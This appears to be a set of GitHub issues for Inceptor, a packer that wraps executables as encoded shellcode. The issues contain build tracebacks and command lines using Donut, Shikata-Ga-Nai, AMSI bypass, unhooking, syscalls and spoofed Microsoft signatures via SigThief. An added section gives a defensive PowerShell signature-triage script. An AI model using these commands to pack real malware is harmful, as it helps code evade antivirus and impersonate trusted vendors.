"C:\Users\test\Downloads\interceptor\inceptor\inceptor" x64 & ""  /permissive- /Bt+ /GS /W3 /Gy /Zi /Gm- /O2i /sdl /Zc:inline /Zc:wchar_t /fp:precise /D "NDEBUG" /D "_CONSOLE" /D "_UNICODE" /D "UNICODE" /errorReport:prompt /WX- /Zc:forScope /Gd /MD /FC /EHsc /nologo /diagnostics:column /Fe:"C:\Users\test\Downloads\interceptor\inceptor\inceptor\temp\int_msg-temp.exe"  "C:\Users\test\Downloads\interceptor\inceptor\inceptor\temp\tmptayar5px.cpp" /link
Traceback (most recent call last):
  File "C:\Users\test\Downloads\interceptor\inceptor\inceptor\generators\NativeArtifactGenerator.py", line 249, in generate
    self.generate_wrapped()
  File "C:\Users\test\Downloads\interceptor\inceptor\inceptor\generators\NativeArtifactGenerator.py", line 292, in generate_wrapped
    self.compile_exe(shellcode)
  File "C:\Users\test\Downloads\interceptor\inceptor\inceptor\generators\NativeArtifactGenerator.py", line 201, in compile_exe
    status = self.compiler.compile([self.exe_writer.outfile] + self.obj_files)
  File "C:\Users\test\Downloads\interceptor\inceptor\inceptor\compilers\Compiler.py", line 66, in compile
    output = subprocess.check_output(cmd, stderr=subprocess.STDOUT)
  File "C:\Users\test\AppData\Local\Programs\Python\Python310\lib\subprocess.py", line 420, in check_output
    return run(*popenargs, stdout=PIPE, timeout=timeout, check=True,
  File "C:\Users\test\AppData\Local\Programs\Python\Python310\lib\subprocess.py", line 501, in run
    with Popen(*popenargs, **kwargs) as process:
  File "C:\Users\test\AppData\Local\Programs\Python\Python310\lib\subprocess.py", line 966, in __init__
    self._execute_child(args, executable, preexec_fn, close_fds,
  File "C:\Users\test\AppData\Local\Programs\Python\Python310\lib\subprocess.py", line 1435, in _execute_child
    hp, ht, pid, tid = _winapi.CreateProcess(executable, args,
PermissionError: [WinError 5] Access is denied

Thanks a lot!

DLL native mode

Hey @klezVirus ,

when you have a moment, could you have a look at below.

I tried to use your tool to generate some DLL and sign them. Here are my results:

python inceptor.py native c:\repos\msgbox32.raw --arch x86 -o cldapi.dll
Does not work. The exported function is called _PsychoBlastEP@16 and it cannot be called successfully.

python inceptor.py native c:\repos\msgbox64.raw --arch x64 -o cldapi.dll
Works perfectly.

python inceptor.py native c:\repos\msgbox64.raw --arch x64 -o cldapi.dll -e XOR
Does not work.

python inceptor.py native c:\repos\msgbox64.raw --arch x64 -o cldapi.dll -s -sd microsoft.com -so
Works but it is not signed.

python inceptor.py native c:\repos\msgbox64.raw --arch x64 -o cldapi.dll -s -sd www.microsoft.com
Works and it is signed.

python inceptor.py native c:\repos\msgbox64.raw --arch x64 -o cldapi.dll --clone C:\Windows\system32\ntdll.dll
Does not work. Breaks the DLL. The output DLL has all exported functions from ntdll.dll.

Any chance for fixing them, please? :)

thanks
Rafal

Access is denied

Thanks for sharing your tools. I have a problem testing the tool.
(venv) C:\Users\trinhbang\Desktop\No1\inceptor\inceptor>python inceptor.py native mihawk.exe -t donut -e xor -C llvm -O --delay 60 --arch x64 --sgn --sign -m amsi,delay,syscalls,unhook,amsi -o mihawk2.exe

[+] Native Artifact Generator Started At 2021-08-08 14:30:53.471625
[*] Phase 0: Loading...
[*] Phase 1: Converting binary into shellcode
[>] Transformer: Donut
[*] Phase 2: Encoding
[>] Phase 2.1: Using Shikata-Ga-Nai x64 to encode the shellcode
[*] Encoded filename: C:\Users\trinhbang\Desktop\No1\inceptor\inceptor\temp\tmpkq4dnf73.raw.sgn
[>] Phase 2.2: Using Inceptor chained-encoder to encode the shellcode
[>] Encoder Chain: XorEncoder
[*] Phase 3: Generating source files using CLASSIC
[>] Phase 3.2: Writing CPP file in .\temp\tmp3f5mr8k8.cpp
[*] Phase 4: EXE compilation and Signing
[>] Phase 4.2: Compiling EXE...
Traceback (most recent call last):
File "C:\Users\trinhbang\Desktop\No1\inceptor\inceptor\generators\NativeArtifactGenerator.py", line 202, in generate
self.generate_wrapped()
File "C:\Users\trinhbang\Desktop\No1\inceptor\inceptor\generators\NativeArtifactGenerator.py", line 241, in generate_wrapped
self.compile_exe(shellcode)
File "C:\Users\trinhbang\Desktop\No1\inceptor\inceptor\generators\NativeArtifactGenerator.py", line 156, in compile_exe
status = self.compiler.compile([self.exe_writer.outfile] + self.obj_files)
File "C:\Users\trinhbang\Desktop\No1\inceptor\inceptor\compilers\Compiler.py", line 63, in compile
output = subprocess.check_output(cmd)
File "c:\users\trinhbang\appdata\local\programs\python\python39\lib\subprocess.py", line 424, in check_output
return run(*popenargs, stdout=PIPE, timeout=timeout, check=True,
File "c:\users\trinhbang\appdata\local\programs\python\python39\lib\subprocess.py", line 505, in run
with Popen(*popenargs, **kwargs) as process:
File "c:\users\trinhbang\appdata\local\programs\python\python39\lib\subprocess.py", line 951, in __init__
self._execute_child(args, executable, preexec_fn, close_fds,
File "c:\users\trinhbang\appdata\local\programs\python\python39\lib\subprocess.py", line 1420, in _execute_child
hp, ht, pid, tid = _winapi.CreateProcess(executable, args,
PermissionError: [WinError 5] Access is denied
I tried to run cmd as Administrator, but can't fix the problem.
Thanks for reading.

The specified executable is not a valid application for this OS platform.

When I try to run the packed exe I get this error: The specified executable is not a valid application for this OS platform.

This is the used command:

python .\inceptor.py dotnet e_inj.exe -o packed.exe -s -sd www.microsoft.com -s -ss "C:\Windows\system32\ntdll.dll"

This is the output:

[+] .Net Artifact Generator Started At 2021-10-31 16:29:16.934982
[*] Phase 0: Loading...
[*] Phase 1: Converting binary into shellcode
  [>] Transformer: Pe2sh
  [WARNING] This is a console application! The recommended subsystem is GUI.
  [WARNING] e_inj.exe may not work in .NET
[*] Phase 2: Encoding
  [>] Encoder Chain: HexEncoder
  [>] Shellcode size: 58060
  [>] Shellcode Signature: 6d567a0c9b79df74844d9d33cad96814185a4416
[*] Phase 3: Generating source files using PE_LOAD
  [>] Phase 3.1: Writing CS file in .\temp\tmpm0gi_vr3.cs
[*] Phase 4: Compiling
[*] Phase 5: Sign dotnet binary
  [+] Signed with: SigThief
[*] Phase 6: Finalising
  [+] Success: file stored at packed.exe
[*] Phase 7: Cleaning up
[+] .Net Artifact Generator Finished At 2021-10-31 16:29:17.700150

And this is the error when I try to run the packed exe:

.\packed.exe
Program 'packed.exe' failed to run: The specified executable is not a valid application for this OS platform.At line:1 char:1
+ .\packed.exe
+ ~~~~~~~~~~~~.
At line:1 char:1

The e_inj.exe executable is written in C with visual studio and compiled in x64.

I get the same error for:

python .\inceptor.py native e_inj.exe -o packed.exe -s -sd www.microsoft.com -s -ss "C:\Windows\system32\ntdll.dll"

python .\inceptor.py native e_inj.exe -o packed.exe -t pe2sh -s -sd www.microsoft.com -s -ss "C:\Windows\system32\ntdll.dll"
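
The reports above describe output files as "signed" after `-sd www.microsoft.com` or `Signed with: SigThief`. As an added example, not part of the original issues or the project's code, this PowerShell function triages a folder by whether each Authenticode signature actually verifies, using the built-in `Get-AuthenticodeSignature`; the function name `Get-SignatureTriage` and the `C:\Triage` path are assumptions.

```powershell
# Added example (defender-side triage). A signature block being present in a
# PE file says nothing about trust: only Status 'Valid' means the hash matches
# the file and the chain ends in a trusted root.
function Get-SignatureTriage {
    param(
        # Folder to inspect; hypothetical path, replace with the one under review.
        [Parameter(Mandatory)][string]$Path
    )

    Get-ChildItem -Path $Path -Recurse -File |
        Where-Object { $_.Extension -in '.exe', '.dll' } |
        ForEach-Object {
            $sig = Get-AuthenticodeSignature -LiteralPath $_.FullName

            # SignerCertificate is $null for unsigned files.
            $subject = ''
            if ($sig.SignerCertificate) {
                $subject = $sig.SignerCertificate.Subject
            }

            $verdict = switch ($sig.Status) {
                'Valid'        { 'ok' }
                'NotSigned'    { 'unsigned' }
                # Signature data does not match this file's contents, which is
                # what a signature copied from another binary produces.
                'HashMismatch' { 'signature does not match file contents' }
                # Any other status: a signature is attached but did not verify,
                # for example because the chain is not trusted on this host.
                default        { 'signature present but not verified' }
            }

            [pscustomobject]@{
                File     = $_.FullName
                Status   = $sig.Status
                Subject  = $subject
                Verdict  = $verdict
                # Subject names a well-known vendor, yet verification failed:
                # the strongest lead for review.
                Mismatch = ($subject -match 'Microsoft') -and
                           ($sig.Status -ne 'Valid')
            }
        }
}

# Usage: list everything that is signed-looking but not verifiably signed.
Get-SignatureTriage -Path 'C:\Triage' |
    Where-Object { $_.Verdict -notin 'ok', 'unsigned' } |
    Sort-Object Mismatch -Descending |
    Format-Table File, Status, Subject, Mismatch -AutoSize
```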

Templates documentation

Is your feature request related to a problem? Please describe.
The main strength of this packer is its ability to use templates, but the way to use them is not documented and a bit hard to understand.

Describe the solution you'd like
I would like some documentation on how to use templates and how the template engine works.

Describe alternatives you've considered

Additional context
